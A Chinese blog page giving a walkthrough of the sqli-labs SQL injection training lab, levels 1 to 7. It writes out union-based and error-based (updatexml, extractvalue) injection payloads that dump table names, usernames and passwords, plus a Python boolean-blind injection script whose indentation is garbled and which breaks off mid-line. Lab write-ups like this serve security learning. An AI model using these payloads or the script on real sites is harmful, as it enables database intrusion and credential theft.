



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="welcome to my blog" href="https://hq185187.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="welcome to my blog" href="https://hq185187.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="welcome to my blog" href="https://hq185187.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="java,git,springcloud" />


<link rel="canonical" href="https://hq185187.github.io/2023/04/28/sqli-labs/">



  <title>
Sqli-labs靶场通关 - SQL注入 |
不良人天藏星 = welcome to my blog = 不良人总舵</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">Sqli-labs靶场通关
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-04-28 15:34:52">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-04-28T15:34:52+08:00">2023-04-28</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>16k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>15 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">不良人天藏星</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
          <img src="/assets/10.jpg">
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/sql/" itemprop="item" rel="index" title="分类于 SQL注入"><span itemprop="name">SQL注入</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://hq185187.github.io/2023/04/28/sqli-labs/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="hq185187">
    <meta itemprop="description" content="不良人总舵, 不定时更新web安全相关知识">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="welcome to my blog">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h3 id="怎么判断字符型或者数字型"><a class="markdownIt-Anchor" href="#怎么判断字符型或者数字型">#</a> 怎么判断字符型或者数字型？</h3>
<p>数字型:id=2 和 id=3-1 返回界面相同<br>
原理：说明 3-1 被解析了，旁边没有引号<br>
字符型:id=2 和 id=2a 页面一样就行<br>
原理：MySQL 等号两边类型不一致会发生强制转换，字符串 -&gt; 数字</p>
<p>group_concat 是用，连接多行记录的函数</p>
<h2 id="less1"><a class="markdownIt-Anchor" href="#less1">#</a> less1</h2>
<p>字符型注入<br>
看源码:sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;</p>
<p>因此:<mark>payload:1’   操作   --+</mark></p>
<p>?id=1’ order by 3–+<br>
?id=1’ order by 4–+<br>
?id=-1’ union select 1,2,3–+// 判断回显位<br>
？id=-1’ union select 1,2,database ()–+<br>
?id=-1’ union select1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+</p>
<p>?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=database()–+</p>
<p>?id=-1’ union select 1,group_concat(username),group_concat(password) from users–+</p>
<h2 id="less2"><a class="markdownIt-Anchor" href="#less2">#</a> less2</h2>
<p>数字型<br>
看源码:sql=“SELECT * FROM users WHERE id=$id LIMIT 0,1”;<br>
 直接输入数字就好，解法与 less1 相同，去掉 less1 的’和–+ 即可</p>
<h2 id="less3"><a class="markdownIt-Anchor" href="#less3">#</a> less3</h2>
<p>id=1’)–+</p>
<h2 id="less4"><a class="markdownIt-Anchor" href="#less4">#</a> less4</h2>
<p>id=1&quot;)–+</p>
<h2 id="less5-报错注入"><a class="markdownIt-Anchor" href="#less5-报错注入">#</a> less5 报错注入</h2>
<h3 id="1updatexml函数"><a class="markdownIt-Anchor" href="#1updatexml函数">#</a> 1.updatexml 函数</h3>
<p>updatexml(xml_doument,XPath_string,new_value)<br>
 第一个参数：XML 的内容<br>
第二个参数：是需要 update 的位置 XPATH 路径<br>
第三个参数：是更新后的内容<br>
所以第一和第三个参数可以随便写，只需要利用第二个参数，他会校验你输入的内容是否符合 XPATH 格式，不对就爆出正确内容<br>
可以校验的：0x7e (~),0x5e24 (^$),’#’(#)<br>
payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,database()),1)--+暴当前数据库</span><br><span class="line"></span><br><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database())),1)--+</span><br><span class="line">此时会出现Subquery returns more than 1 row</span><br></pre></td></tr></table></figure>
<h4 id="1可以用limit解决limit-01-11-21-31"><a class="markdownIt-Anchor" href="#1可以用limit解决limit-01-11-21-31">#</a> 1. 可以用 limit 解决，limit 0,1 1,1 2,1 3,1</h4>
<p>limit (a,b): 从 a 开始往后看 b 个内容</p>
<p>在 limit 3,1 找到 users 表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()limit 3,1)),1)--+</span><br></pre></td></tr></table></figure>
<p>后面同理爆字段</p>
<h4 id="2加个group_concat解决"><a class="markdownIt-Anchor" href="#2加个group_concat解决">#</a> 2. 加个 group_concat 解决</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+</span><br><span class="line">过程同上</span><br><span class="line"></span><br><span class="line">最后</span><br><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,(select group_concat(username) from users)),1)--+</span><br></pre></td></tr></table></figure>
<h4 id="3substr方法"><a class="markdownIt-Anchor" href="#3substr方法">#</a> 3.substr 方法</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)--+</span><br><span class="line">最后:</span><br><span class="line">?id=1&#x27; and updatexml(1,concat(0x7e,substr((select group_concat(id,username,password) from users),1,31),0x7e),1)--+</span><br></pre></td></tr></table></figure>
<p>后面把 1,31 换成 32,31  和 63,31 和 94,31<br>
<mark> 因为 substr 一次只能截取 32 个</mark></p>
<h3 id="2extractvalue函数"><a class="markdownIt-Anchor" href="#2extractvalue函数">#</a> 2.extractvalue 函数</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">函数原型：extractvalue(xml_document,Xpath_string)</span><br><span class="line">第一个参数：xml_document是string格式，为xml文档对象的名称</span><br><span class="line">第二个参数：Xpath_string是xpath格式的字符串</span><br><span class="line">作用：从目标xml中返回包含所查询值的字符串</span><br></pre></td></tr></table></figure>
<p>第二个参数若不符合 xpath 语法就会报错出信息，因此可以利用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))--+</span><br><span class="line"></span><br><span class="line">?id=1&#x27; and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27;)))--+</span><br></pre></td></tr></table></figure>
<p><mark>但是这个函数也是最大只能截取 32 个，因此想看后面的还得要 substr 函数</mark></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and extractvalue(1,concat(0x7e,substr((select group_concat(id,username,password)from users),31,31)))--+</span><br></pre></td></tr></table></figure>
<h3 id="less6"><a class="markdownIt-Anchor" href="#less6">#</a> less6</h3>
<p>id=1&quot; 与 less5 一样</p>
<h3 id="less7"><a class="markdownIt-Anchor" href="#less7">#</a> less7</h3>
<p>布尔盲注:<br>
 首先试探闭合情况</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;--+</span><br><span class="line">1&quot;--+</span><br><span class="line">1&#x27;)--+</span><br><span class="line">1&#x27;))--+  这个是</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1 and (select mid((group_concat(username,0x7e,password) from users),1,1))=&#x27;D&#x27;</span><br></pre></td></tr></table></figure>
<p>根据页面回显试探数据，可以二分法，函数:substring (),mid (),substr ()</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://sqli-labs:100/Less-7/&quot;</span> <span class="comment"># 有可利用漏洞的url，根据实际情况填写</span></span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Safari/537.36&quot;</span>, &#125; <span class="comment"># http request报文头部，根据实际情况填写</span></span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">keylist = [<span class="built_in">chr</span>(i) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>, <span class="number">127</span>)] <span class="comment"># 包括数字、大小写字母、可见特殊字符</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">&#x27;You are in&#x27;</span> <span class="comment"># 用于判断附加sql语句为真的字符，根据网页回显填写</span></span><br><span class="line"></span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">CurrentDatabase7</span>():</span><br><span class="line"></span><br><span class="line">n = <span class="number">10</span> <span class="comment"># 预测当前数据库名称最大可能的长度，根据实际情况填写</span></span><br><span class="line"></span><br><span class="line">k = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">j = n // <span class="number">2</span></span><br><span class="line"></span><br><span class="line">length = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">db = <span class="built_in">str</span>()</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> j &gt; k <span class="keyword">and</span> j &lt; n <span class="keyword">and</span> j - k&gt; <span class="number">3</span>:</span><br><span class="line"></span><br><span class="line">    payload1 = <span class="string">&quot;1&#x27;)) and length(database())&gt;&quot;</span> + <span class="built_in">str</span>(j) + <span class="string">&quot;-- ss&quot;</span> <span class="comment"># 所有payload根据实际情况填写</span></span><br><span class="line"></span><br><span class="line">    param = &#123;</span><br><span class="line"></span><br><span class="line">    <span class="string">&quot;id&quot;</span>: payload1,</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    response = requests.get(url, params=param, headers=headers) <span class="comment"># GET方法发送含payload的request</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># print(response.request.headers)</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># print(response.text)</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> response.text.find(flag) != -<span class="number">1</span>:</span><br><span class="line"></span><br><span class="line">    n = n</span><br><span class="line"></span><br><span class="line">    k = j</span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line"></span><br><span class="line">    k = k</span><br><span class="line"></span><br><span class="line">    n = j</span><br><span class="line"></span><br><span class="line">    j = (n - k) // <span class="number">2</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">elif</span> j - k == <span class="number">3</span> <span class="keyword">or</span> j - k &lt; <span class="number">3</span>: <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(k - <span class="number">1</span>, n + <span class="number">2</span>): payload2=<span class="string">&quot;1&#x27;)) and length(database())=&quot;</span> + <span class="built_in">str</span>(i)</span><br><span class="line"></span><br><span class="line">        + <span class="string">&quot;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> : payload2, &#125; response=requests.get(url, params=param, headers=headers) <span class="keyword">if</span></span><br><span class="line"></span><br><span class="line">        response.text.find(flag) !=-<span class="number">1</span>: length=i <span class="keyword">break</span> <span class="keyword">break</span> <span class="keyword">else</span>: <span class="keyword">break</span> <span class="built_in">print</span>(<span class="string">&quot;the name of current database</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        contains &quot;</span> + <span class="built_in">str</span>(length) + <span class="string">&quot; characters&quot;</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length + <span class="number">1</span>): <span class="keyword">for</span> c <span class="keyword">in</span> keylist:</span><br><span class="line"></span><br><span class="line">        payload3=<span class="string">&quot;1&#x27;)) and substring(database(),&quot;</span> + <span class="built_in">str</span>(i) + <span class="string">&quot;,1)=&#x27;&quot;</span> + c + <span class="string">&quot;&#x27;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> : payload3, &#125;</span><br><span class="line"></span><br><span class="line">        response=requests.get(url, params=param, headers=headers) <span class="keyword">if</span> response.text.find(flag) !=-<span class="number">1</span>: db=db + c <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;the name of current database is &quot;</span> + <span class="built_in">str</span>(db))</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Tables7</span>():</span><br><span class="line"></span><br><span class="line">    n = <span class="number">100</span>  <span class="comment"># 预测当前数据库中所有表名称最大可能的长度，根据实际情况填写</span></span><br><span class="line"></span><br><span class="line">    k = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    j = n // <span class="number">2</span></span><br><span class="line"></span><br><span class="line">    length = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    tname = <span class="built_in">str</span>()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> j &gt; k <span class="keyword">and</span> j &lt; n <span class="keyword">and</span> j - k &gt; <span class="number">3</span>:</span><br><span class="line"></span><br><span class="line">            payload4 = <span class="string">&quot; 1&#x27;)) and (length((select group_concat(table_name) from information_schema.tables where</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        table_schema=database())))&gt;&quot;</span> + <span class="built_in">str</span>(</span><br><span class="line"></span><br><span class="line">        j) + <span class="string">&quot;-- ss&quot;</span></span><br><span class="line"></span><br><span class="line">        param = &#123;</span><br><span class="line"></span><br><span class="line">        <span class="string">&quot;id&quot;</span>: payload4,</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        response = requests.get(url, params=param, headers=headers)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> response.text.find(flag) != -<span class="number">1</span>:</span><br><span class="line"></span><br><span class="line">        n = n</span><br><span class="line"></span><br><span class="line">        k = j</span><br><span class="line"></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line"></span><br><span class="line">        k = k</span><br><span class="line"></span><br><span class="line">        n = j</span><br><span class="line"></span><br><span class="line">        j = (n - k) // <span class="number">2</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">elif</span> j - k == <span class="number">3</span> <span class="keyword">or</span> j - k &lt; <span class="number">3</span>: <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(k - <span class="number">1</span>, n + <span class="number">2</span>):</span><br><span class="line"></span><br><span class="line">            payload5=<span class="string">&quot;1&#x27;)) and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))=&quot;</span></span><br><span class="line"></span><br><span class="line">            + <span class="built_in">str</span>( i) + <span class="string">&quot;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> : payload5, &#125; response=requests.get(url, params=param, headers=headers) <span class="keyword">if</span></span><br><span class="line"></span><br><span class="line">            response.text.find(flag) !=-<span class="number">1</span>: length=i <span class="keyword">break</span> <span class="keyword">break</span> <span class="keyword">else</span>: <span class="keyword">break</span> <span class="built_in">print</span>(<span class="string">&quot;the name of all tables in current</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">            database contains &quot;</span> + <span class="built_in">str</span>(length) + <span class="string">&quot; characters&quot;</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length + <span class="number">1</span>): <span class="keyword">for</span> c <span class="keyword">in</span> keylist:</span><br><span class="line"></span><br><span class="line">            payload6=<span class="string">&quot;1&#x27;)) and substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),&quot;</span></span><br><span class="line"></span><br><span class="line">            + <span class="built_in">str</span>( i) + <span class="string">&quot;,1)=&#x27;&quot;</span> + c + <span class="string">&quot;&#x27;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> : payload6, &#125; response=requests.get(url, params=param,</span><br><span class="line"></span><br><span class="line">            headers=headers) <span class="keyword">if</span> response.text.find(flag) !=-<span class="number">1</span>: tname=tname + c <span class="keyword">break</span> <span class="built_in">print</span>(<span class="string">&quot;the name of all tables in</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">            current database is &quot;</span> + <span class="built_in">str</span>(tname))</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Columns7</span>(<span class="params">table</span>):  <span class="comment"># table参数是需要爆破的数据表名称，记得加单引号</span></span><br><span class="line"></span><br><span class="line">    n = <span class="number">200</span>  <span class="comment"># 预测某个表所有列名称最大可能的长度，根据实际情况填写</span></span><br><span class="line"></span><br><span class="line">    k = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    j = n // <span class="number">2</span></span><br><span class="line"></span><br><span class="line">    length = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    cname = <span class="built_in">str</span>()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> j &gt; k <span class="keyword">and</span> j &lt; n <span class="keyword">and</span> j - k &gt; <span class="number">3</span>:</span><br><span class="line"></span><br><span class="line">            payload7 = <span class="string">&quot; 1&#x27;)) and (length((select group_concat(column_name) from information_schema.columns where</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">            table_name=&#x27;&quot;</span> + table + <span class="string">&quot;&#x27; and table_schema=database())))&gt;&quot;</span> + <span class="built_in">str</span>(</span><br><span class="line"></span><br><span class="line">            j) + <span class="string">&quot;-- ss&quot;</span></span><br><span class="line"></span><br><span class="line">            param = &#123;</span><br><span class="line"></span><br><span class="line">            <span class="string">&quot;id&quot;</span>: payload7,</span><br><span class="line"></span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            response = requests.get(url, params=param, headers=headers)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> response.text.find(flag) != -<span class="number">1</span>:</span><br><span class="line"></span><br><span class="line">            n = n</span><br><span class="line"></span><br><span class="line">            k = j</span><br><span class="line"></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line"></span><br><span class="line">            k = k</span><br><span class="line"></span><br><span class="line">            n = j</span><br><span class="line"></span><br><span class="line">            j = (n - k) // <span class="number">2</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">elif</span> j - k == <span class="number">3</span> <span class="keyword">or</span> j - k &lt; <span class="number">3</span>: <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(k - <span class="number">1</span>, n + <span class="number">2</span>):</span><br><span class="line"></span><br><span class="line">                payload8=<span class="string">&quot;1&#x27;)) and (length((select group_concat(column_name) from information_schema.columns where table_name = &#x27;&quot;</span></span><br><span class="line"></span><br><span class="line">                + table + <span class="string">&quot;&#x27; and table_schema = database())))=&quot;</span> + <span class="built_in">str</span>( i) + <span class="string">&quot;-- ss&quot;</span> param=&#123; <span class="string">&quot;id&quot;</span> : payload8, &#125;</span><br><span class="line"></span><br><span class="line">                response=requests.get(url, params=param, headers=headers) <span class="keyword">if</span> response.text.find(flag) !=-<span class="number">1</span>: length=i</span><br><span class="line"></span><br><span class="line">                <span class="keyword">break</span> <span class="keyword">break</span> <span 